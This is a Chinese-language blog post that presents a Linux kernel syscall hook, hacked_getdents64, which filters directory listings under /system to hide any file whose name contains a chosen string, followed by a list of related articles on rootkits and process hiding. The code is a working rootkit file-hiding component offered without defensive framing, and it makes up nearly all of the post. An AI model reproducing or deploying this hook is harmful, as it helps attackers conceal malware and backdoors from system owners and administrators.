hook sys_getdents64隐藏文件

最新推荐文章于 2023-01-19 09:44:58 发布
最新推荐文章于 2023-01-19 09:44:58 发布
阅读量2.3k 收藏
点赞数
分类专栏: linux 文章标签: linux linux kernel hook
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p0x1307/article/details/39962461
版权 


long (*orig_getdents64)(unsigned int fd, struct linux_dirents64 *dirp, unsigned int count);

unsigned long system_ino = -1;  // ino of /system

void system_ino_init(void)
{
    struct file *filp;

    if ((filp = filp_open("/system", O_RDONLY, 0)) != NULL)
    {
        system_ino = filp->f_dentry->d_inode->i_ino;
        filp_close(filp, NULL);
    }
}

asmlinkage long hacked_getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count)
{
    long ret, tmp;
    struct linux_dirent64 *td;

    ret = orig_getdents64(fd, dirp, count);

    /* Only hide file in /system */
    if (unlikely(dirp->d_ino == system_ino))
    {
        td = dirp;
        tmp = ret;
        while (tmp > 0) 
        {
            tmp -= td->d_reclen;

            if (strstr(td->d_name, "xxx") != NULL) 
            {
                ret -= td->d_reclen;
                if (tmp)
                    memmove(td, (char *)td + td->d_reclen, tmp);
            }
            else
            {
                td = (struct linux_dirent64 *)((char *)td + td->d_reclen);
            }
        }
    }

    return ret;
}


p0x1307
关注
专栏目录
Linux隐藏进程
无与伦比BLOG
03-09 5534
系统信息:内核为2.6.32, CentOSX86_64 由于不能修改内核源码,故需要引入劫持系统调用技术、Linux可卸载模块编程技术 示例程序 #include #include #include #include #include #include #include #include #include #define CALLOFF 100 //define
Rootkit与后门隐藏
城志的学习笔记
02-05 1484
文章目录简介Linux权限管理查看权限目录的权限:权限管理权限操作函数获取root shell防止拷贝linux虚拟文件系统VFS隐藏文件hook 系统调用sys_getdentsgetdents的系统调用树系统调用流程hook getdents隐藏进程日志修改 简介 Rootkit是一套工具,用于长期获取root权限以及隐藏自己和后门程序。攻击者通过漏洞临时获得terget的root权限后,一般...
Linux 文件/文件隐藏hook getdents)
qq_42931917的博客
09-28 2885
前面讲的都是一些基础,比如说拿到sys_call_table地址,简单的hook某个函数,这一节做一个文件/文件隐藏,就是hook文件枚举API --> getdents()&getdents64() fshid.c #include <linux/init.h> #include <linux/module.h> #include <linux/syscalls.h> #include <linux/kallsyms.h> #include
ls命令是怎样实现的,getdents64linux-2.6.27.5
cnbird's blog
09-13 3492
http://www.cppblog.com/momoxiao/archive/2010/04/04/111594.html 先通过strace来看下ls命令的执行都做了哪些系统调用: strace -o ls.txt ls  运行结果,这儿只摘取了ls.txt中我们感兴趣的部分: open(".", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTOR
一个rootkit程序--隐藏文件和进程
To be, or not to be: that is the question
01-07 1616
This is SUSs rootkit. It can hide files and processes   when their names include "_sus_".=================================================================Written by dklkt.  2007.9Notice that
一种Linux隐藏文件的新方法
weixin_33701564的博客
08-09 427
一. 概述目前通用的隐藏文件方法还是hooksys_getdents64系统调用, 大致流程就是先调用原始的sys_getdents64系统调用,然后在在buf中做过滤。修改sys_call_table是比较原始的rk技术了,碰到好点的管理员, 基本上gdb一下vmlinux就能检测出来。 如何想做到更加隐蔽的话,就要寻找新的技术。 inline hook也是目前比较流行的做...
arm64系统调用之getdents64
最新发布
gjioui123的博客
01-19 1282
在头文件include/uapi/asm-generic/unistd.h 中是所有内核支持的系统调用。通过_SYSCALL宏来定义。分析getdents64系统调用。定义fs/readdir.c。下面是实现的部分在{}中。
(渗透测试后期)Linux进程隐藏详解
热门推荐
qq_42882717的博客
03-27 1万+
文章目录(渗透测试后期)Linux进程隐藏详解前言Linux进程基础Linux进程侦查手段Linux进程隐藏手段一、基于用户态的进程隐藏方法1:小隐隐于/proc/pid——劫持readdir系统调用额外:加载至arm方法2:小隐隐于/proc/pid——mount 挂载二、基于内核态的进程隐藏方法3:大隐隐于内核——修改内核源码+系统调用方法4:大隐隐于内核——修改内核源码proc_pid_lookup方法5:大隐隐于内核——编写驱动/内核模块——LKM实现进程隐藏总结 (渗透测试后期)Linux进程隐藏
Hook android系统调用研究(一)
墨鱼菜鸡
02-20 481
本文的博客链接:http://blog.csdn.net/qq1084283172/article/details/55657300 一、Android内核源码的编译环境 系统环境:Ubuntu 14.04 x64bit Android系统版本:Android 4.4.4 r1 Android内核版本:a...
proc文件系统下文件隐藏
ch-o-bits~
12-14 1114
proc文件系统下,文件从proc_dir_entry链表摘除
sys_getdents
anzhuangguai的专栏
10-14 3462
 http://linux.die.net/man/2/getdents int getdents(unsigned int fd, struct linux_dirent *dirp,              unsigned int count); fd指目录文件描述符。可以用sys_open创建。 dirp指目录信息,其大小由第3个参数指定,
linux内核中的hook,Linux内核Hook系统调用
weixin_42394913的博客
04-29 509
1,截获write系统调用:#ifndef MODULE#define MODULE#endif#ifndef __KERNEL__#define __KERNEL__#endif#include #include #include #include #include #include /*#include #include #include #include #include #include ...
两个linux内核rootkit--之一:enyelkm
Netfilter
02-09 6875
首先,这个rootkit其实是一个内核木马,和大多数木马不同的是,恶意木马所在的机器是客户端而不是服务器,而黑客所在的机器是服务器,这样做的好处在于可以躲避防火墙,一般的防火墙对外出的包审查不是那么严格而对进入的包审查严格,如果恶意程序是服务器,那么防火墙很可能会拦截连入服务器的黑客客户端进程导致攻击受到阻碍,现在的情况是黑客所在的机器是服务器,他首先发送召唤包到客户端,客户端收到召唤包以后就会连
rootkit技术
sdulibh的专栏
02-25 6351
熬夜写llroot,写的头有些晕了,代码也有点乱,所以停下来歇歇;就又去逆向昨天下的那个rootkit,搞了1个多小时,头又晕了,才搞了不到一半,夜深人静的时候,孤孤单单,没有美女陪,不爽啊.想想好长时间没有在这个blog上写技术文章了,于是就转来下面一篇文章,文章比较老了,针对linux2.2内核的,但是基本的思路是没有失效的.正好这学期的操作系统课程考试也打算让研究生写一些类似的程序,所以贴在
linux getdents 例子,Linux内建命令和外部命令(整理)
weixin_39928801的博客
05-20 510
Linux命令有内部命令(内建命令)和外部命令之分,内部命令和外部命令功能基本相同,但也有些细微差别。【内部命令 vs. 外部命令】(1)内部命令实际上是shell程序的一部分,其中包含的是一些比较简单的linux系统命令,这些命令由shell程序识别并在shell程序内部完成运行,通常在linux系统加载运行时shell就被加载并驻留在系统内存中。内部命令是写在bashy源码里面的,其执行速度比...
overlayfs源代码解析
YLSnowy的博客
07-11 1270
overlayfs源代码分许
linux 函数 时间 效率,求教:lstat和getdents64函数的效率跟inode数量有没有关系
weixin_32401763的博客
05-02 306
这2个函数是不是遍历搜索所有的inode来才能输出结果呢?如果不是,它们的时间复杂度是跟什么有关的?最近遇到一个问题,两台配置一样的服务器,一台上面ls,du,tar挂载在本地SAN的文件系统的速度很慢,strace发现耗时主要在lstat和getdents64两个函数上面。比较慢的系统(只取前5行)#strace-cdu-sh/mount_fs/var%timesecond...
Linux Kernel Hook实验:系统调用拦截与sys_call_table修改
实验目的是为了在Ubuntu 64位操作系统环境下,通过Linux Kernel Module (LKM)技术理解并实现内核级Hook功能,通过这个过程学习和观察系统调用的挂钩行为,进一步深化对Linux内核模块的理解。 2. 实验原理: ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值